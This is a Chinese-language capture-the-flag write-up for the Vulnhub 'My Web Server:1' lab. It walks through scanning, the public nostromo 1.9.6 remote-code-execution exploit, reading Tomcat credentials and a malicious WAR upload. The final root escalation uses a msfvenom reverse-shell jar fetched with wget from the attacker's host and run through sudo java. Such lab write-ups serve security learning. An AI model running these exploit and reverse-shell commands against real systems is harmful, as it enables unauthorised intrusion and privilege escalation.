CTF_Vulnhub My Web Server:1—Writeup

2022-04-26 09:12:18 浏览数 (1)

CTF_Vulnhub My Web Server:1—Writeup

Get Box:https://www.[vulnhub.com/entry/my-web-server-1,463/](http://vulnhub.com/entry/my-web-server-1,463/)

下载好OVF后直接导入虚拟机即可

不错可以直接看到IP,那么就打开kali linux开始吧

打开卡里二话不说直接一顿NMAP

可以很清楚的看到22,80,2222,3306,8009,8080,还有8081端口开放

查看80端口 还有8080 80801 2222

随便尝试一下看看是否存在默认密码等

很明显失败了

再看看8081端口

类似于一个博客吧

再看看2222端口

哦天呐太多好看的小姐姐了吧

也是一个类似博客的网页

那么现在就直接进入正题吧通过dirb nikto searchsploit等工具的信息收集发现searchsploit发现2222号端口的nostromo1.9.6有远程代码执行漏洞

dirb大量的扫描结果

nikto扫描结果

Searchsploit扫描结果

关于这个nostromo我在看雪论坛也发现一篇翻译的文章 有兴趣可以去看看(https://bbs.[pediy.com/thread-256798.htm)](http://pediy.com/thread-256798.htm))

首先cp

直接python会报错 我开始还以为是程序问题 后来发现直接注释掉就行

用法比较简单就是IP 端口 命令

先试试python 47837.py 192.168.0.100 2222 whoami

python 47837.py 192.168.0.100 2222 id

那么先GETSHELL吧

用kali自带的

改自己卡里IP和你要的端口 随意奥

启动阿帕奇

Nc start

然后python -c import“pty;pty.spawn(‘/bin/bash’)

通过查看tomcat-users.xml可以发现TOMCAT的管理后台密码

msfvenom生成一个war

然后上传即可

然后访问http://192.168.0.100:8080/exp/

现在已经切换到了TOMCAT用户 其实本来不想这么麻烦的 只是我试了一下直接切换TOMCAT用户 能用到的密码都失败了

Sudo -l

msfvenom -p java/shell_reverse_tcp LHOST=192.168.0.108 LPORT=7775 -f jar > expjar.jar

启动NC监听并把生成的jar复制到var/www/html目录下

Wget http://192.168.0.108/expjar.jar

然后sudo /usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java -jar ./expjar.jar

0 人点赞